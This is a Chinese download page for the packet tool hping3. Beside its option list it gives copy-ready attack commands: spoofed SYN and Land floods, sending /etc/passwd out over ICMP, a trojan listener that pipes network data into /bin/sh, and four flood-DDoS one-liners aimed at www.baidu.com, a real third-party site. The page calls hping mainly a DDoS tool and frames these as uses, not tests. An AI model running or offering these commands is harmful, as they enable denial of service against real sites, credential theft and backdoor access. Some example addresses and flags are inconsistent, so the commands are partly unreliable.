hping3下載安裝 最新更新|軟件分類|軟件專題|手機(jī)版|論壇轉(zhuǎn)貼|軟件發(fā)布

您當(dāng)前所在位置: 首頁系統(tǒng)工具系統(tǒng)設(shè)置 → hping3 v20051105 安裝版

hping3

v20051105 安裝版

hping3下載
  • 軟件大?。?span itemprop="fileSize">570.00 KB
  • 軟件語言:中文
  • 軟件類型:國(guó)產(chǎn)軟件 / 系統(tǒng)設(shè)置
  • 軟件授權(quán): 免費(fèi)軟件
  • 更新時(shí)間:2021-08-09 15:41:18
  • 軟件等級(jí):4星
  • 軟件廠商: -
  • 應(yīng)用平臺(tái):WinAll
  • 軟件官網(wǎng):

ITMOP本地下載文件大小:570.00 KB

點(diǎn)贊 好評(píng) 0%(0) 差評(píng) 差評(píng) 0%(0)

軟件介紹人氣軟件精品推薦相關(guān)文章網(wǎng)友評(píng)論下載地址

小編為您推薦: hping3 命令工具

hping3是一款可以用于幫助用戶使用計(jì)算機(jī)命令行來生成和解析TCP/IP協(xié)議數(shù)據(jù)包匯編/分析的免費(fèi)開源工具,支持多種協(xié)議,在各個(gè)系統(tǒng)上都可以較為穩(wěn)定的運(yùn)行,幫助用戶快速的測(cè)試網(wǎng)絡(luò)安全等等一系列的功能

軟件功能

- 防火墻測(cè)試

- 高級(jí)端口掃描

- 網(wǎng)絡(luò)測(cè)試,使用不同的協(xié)議,TOS,分片

- 手動(dòng)路徑MTU發(fā)現(xiàn)

- 在所有支持的協(xié)議下,高級(jí)traceroute

- 遠(yuǎn)程操作系統(tǒng)指紋

- 遠(yuǎn)程正常運(yùn)行時(shí)間猜測(cè)

- TCP/IP協(xié)議棧審計(jì)

- hping也可以用于學(xué)習(xí)TCP/IP的學(xué)生

hping3安裝

用法介紹

用法: hping3 host [options]

-h --help 顯示幫助

-v --version 顯示版本

-c --count 發(fā)送數(shù)據(jù)包的數(shù)目

-i --interval 發(fā)送數(shù)據(jù)包間隔的時(shí)間 (uX即X微秒, 例如: -i u1000)

--fast 等同 -i u10000 (每秒10個(gè)包)

--faster 等同 -i u1000 (每秒100個(gè)包)

--flood 盡最快發(fā)送數(shù)據(jù)包,不顯示回復(fù)。

-n --numeric 數(shù)字化輸出,象征性輸出主機(jī)地址。

-q --quiet 安靜模式

-I --interface 網(wǎng)卡接口 (默認(rèn)路由接口)

-V --verbose 詳細(xì)模式

-D --debug 調(diào)試信息

-z --bind 綁定ctrl+z到ttl(默認(rèn)為目的端口)

-Z --unbind 取消綁定ctrl+z鍵

--beep 對(duì)于接收到的每個(gè)匹配數(shù)據(jù)包蜂鳴聲提示

hping3安裝

模式亮點(diǎn)

模式選擇

default mode TCP // 默認(rèn)模式是 TCP

-0 --rawip RAWIP模式,原始IP模式。在此模式下HPING會(huì)發(fā)送帶數(shù)據(jù)的IP頭。即裸IP方式。使用RAWSOCKET方式。

-1 --icmp ICMP模式,此模式下HPING會(huì)發(fā)送IGMP應(yīng)答報(bào),你可以用--ICMPTYPE --ICMPCODE選項(xiàng)發(fā)送其他類型/模式的ICMP報(bào)文。

-2 --udp UDP 模式,缺省下,HPING會(huì)發(fā)送UDP報(bào)文到主機(jī)的0端口,你可以用--baseport --destport --keep選項(xiàng)指定其模式。

-8 --scan SCAN mode. //掃描模式 指定掃描對(duì)應(yīng)的端口。

Example: hping --scan 1-30,70-90 -S www.target.host // 掃描

-9 --listen listen mode // 監(jiān)聽模式

IP 模式

-a --spoof spoof source address //源地址欺騙。偽造IP攻擊,防火墻就不會(huì)記錄你的真實(shí)IP了,當(dāng)然回應(yīng)的包你也接收不到了。

--rand-dest random destionation address mode. see the man. // 隨機(jī)目的地址模式。詳細(xì)使用 man 命令

--rand-source random source address mode. see the man. // 隨機(jī)源地址模式。詳細(xì)使用 man 命令

hping3安裝

功能介紹

防火墻測(cè)試

使用Hping3指定各種數(shù)據(jù)包字段,依次對(duì)防火墻進(jìn)行詳細(xì)測(cè)試。請(qǐng)參考:http://0daysecurity.com/articles/hping3_examples.html

測(cè)試防火墻對(duì)ICMP包的反應(yīng)、是否支持traceroute、是否開放某個(gè)端口、對(duì)防火墻進(jìn)行拒絕服務(wù)攻擊(DoS attack)。例如,以LandAttack方式測(cè)試目標(biāo)防火墻(Land Attack是將發(fā)送源地址設(shè)置為與目標(biāo)地址相同,誘使目標(biāo)機(jī)與自己不停地建立連接)。

hping3 -S -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10

端口掃描

Hping3也可以對(duì)目標(biāo)端口進(jìn)行掃描。Hping3支持指定TCP各個(gè)標(biāo)志位、長(zhǎng)度等信息。以下示例可用于探測(cè)目標(biāo)機(jī)的80端口是否開放:

hping3 -I eth0 -S 192.168.10.1 -p 80

其中-I eth0指定使用eth0端口,-S指定TCP包的標(biāo)志位SYN,-p 80指定探測(cè)的目的端口。

hping3支持非常豐富的端口探測(cè)方式,nmap擁有的掃描方式hping3幾乎都支持(除開connect方式,因?yàn)镠ping3僅發(fā)送與接收包,不會(huì)維護(hù)連接,所以不支持connect方式探測(cè))。而且Hping3能夠?qū)Πl(fā)送的探測(cè)進(jìn)行更加精細(xì)的控制,方便用戶微調(diào)探測(cè)結(jié)果。當(dāng)然,Hping3的端口掃描性能及綜合處理能力,無法與Nmap相比。一般使用它僅對(duì)少量主機(jī)的少量端口進(jìn)行掃描。

Idle掃描

Idle掃描(Idle Scanning)是一種匿名掃描遠(yuǎn)程主機(jī)的方式,該方式也是有Hping3的作者Salvatore Sanfilippo發(fā)明的,目前Idle掃描在Nmap中也有實(shí)現(xiàn)。

該掃描原理是:尋找一臺(tái)idle主機(jī)(該主機(jī)沒有任何的網(wǎng)絡(luò)流量,并且IPID是逐個(gè)增長(zhǎng)的),攻擊端主機(jī)先向idle主機(jī)發(fā)送探測(cè)包,從回復(fù)包中獲取其IPID。冒充idle主機(jī)的IP地址向遠(yuǎn)程主機(jī)的端口發(fā)送SYN包(此處假設(shè)為SYN包),此時(shí)如果遠(yuǎn)程主機(jī)的目的端口開放,那么會(huì)回復(fù)SYN/ACK,此時(shí)idle主機(jī)收到SYN/ACK后回復(fù)RST包。然后攻擊端主機(jī)再向idle主機(jī)發(fā)送探測(cè)包,獲取其IPID。那么對(duì)比兩次的IPID值,我們就可以判斷遠(yuǎn)程主機(jī)是否回復(fù)了數(shù)據(jù)包,從而間接地推測(cè)其端口狀態(tài)。

拒絕服務(wù)攻擊

使用Hping3可以很方便構(gòu)建拒絕服務(wù)攻擊。比如對(duì)目標(biāo)機(jī)發(fā)起大量SYN連接,偽造源地址為192.168.10.99,并使用1000微秒的間隔發(fā)送各個(gè)SYN包。

hping3 -I eth0 -a 192.168.10.99 -S 192.168.10.33 -p 80 -i u1000

其他攻擊如smurf、teardrop、land attack等也很容易構(gòu)建出來。

文件傳輸

Hping3支持通過TCP/UDP/ICMP等包來進(jìn)行文件傳輸。相當(dāng)于借助TCP/UDP/ICMP包建立隱秘隧道通訊。實(shí)現(xiàn)方式是開啟監(jiān)聽端口,對(duì)檢測(cè)到的簽名(簽名為用戶指定的字符串)的內(nèi)容進(jìn)行相應(yīng)的解析。在接收端開啟服務(wù):

hping3 192.168.1.159 --listen signature --safe --icmp

監(jiān)聽I(yíng)CMP包中的簽名,根據(jù)簽名解析出文件內(nèi)容。

在發(fā)送端使用簽名打包的ICMP包發(fā)送文件:

hping3 192.168.1.108--icmp -d 100 --sign signature --file /etc/passwd

將/etc/passwd密碼文件通過ICMP包傳給192.168.10.44主機(jī)。發(fā)送包大小為100字節(jié)(-d 100),發(fā)送簽名為signature(-sign signature)。

木馬功能

如果Hping3能夠在遠(yuǎn)程主機(jī)上啟動(dòng),那么可以作為木馬程序啟動(dòng)監(jiān)聽端口,并在建立連接后打開shell通信。與netcat的后門功能類似。

示例:本地打開53號(hào)UDP端口(DNS解析服務(wù))監(jiān)聽來自192.168.10.66主機(jī)的包含簽名為signature的數(shù)據(jù)包,并將收到的數(shù)據(jù)調(diào)用/bin/sh執(zhí)行。

在木馬啟動(dòng)端:

hping3 192.168.10.66 --listen signature --safe --udp -p 53 | /bin/sh

在遠(yuǎn)程控制端:

echo ls >test.cmd

hping3 192.168.10.44 -p53 -d 100 --udp --sign siganature --file ./test.cmd

將包含ls命令的文件加上簽名signature發(fā)送到192.168.10.44主機(jī)的53號(hào)UDP端口,包數(shù)據(jù)長(zhǎng)度為100字節(jié)。

當(dāng)然這里只是簡(jiǎn)單的演示程序,真實(shí)的場(chǎng)景,控制端可以利益shell執(zhí)行很多的高級(jí)復(fù)雜的操作。

hping主要是進(jìn)行DDOS攻擊的

1、UDP ddos攻擊:

hping3 -c 10000 -d 120 --udp -w 64 -p 80 --flood --rand-source www.baidu.com

2、ICMP? ddos攻擊:

hping3 -c 10000 -d 120 --icmp -w 64 -p 80 --flood --rand-source www.baidu.com

3、SYN ddos攻擊:

hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source www.baidu.com

4、ACK ddos攻擊:

hping3 -c 10000 -d 120 -A -w 64 -p 80 --flood --rand-source www.baidu.com

更多>> 軟件截圖

推薦應(yīng)用

其他版本下載

    精品推薦

    相關(guān)文章

      下載地址

      • hping3 v20051105 安裝版

      查看所有評(píng)論>> 網(wǎng)友評(píng)論

      發(fā)表評(píng)論

      (您的評(píng)論需要經(jīng)過審核才能顯示) 網(wǎng)友粉絲QQ群號(hào):374962675

      查看所有 0條 評(píng)論>>

      更多>> 猜你喜歡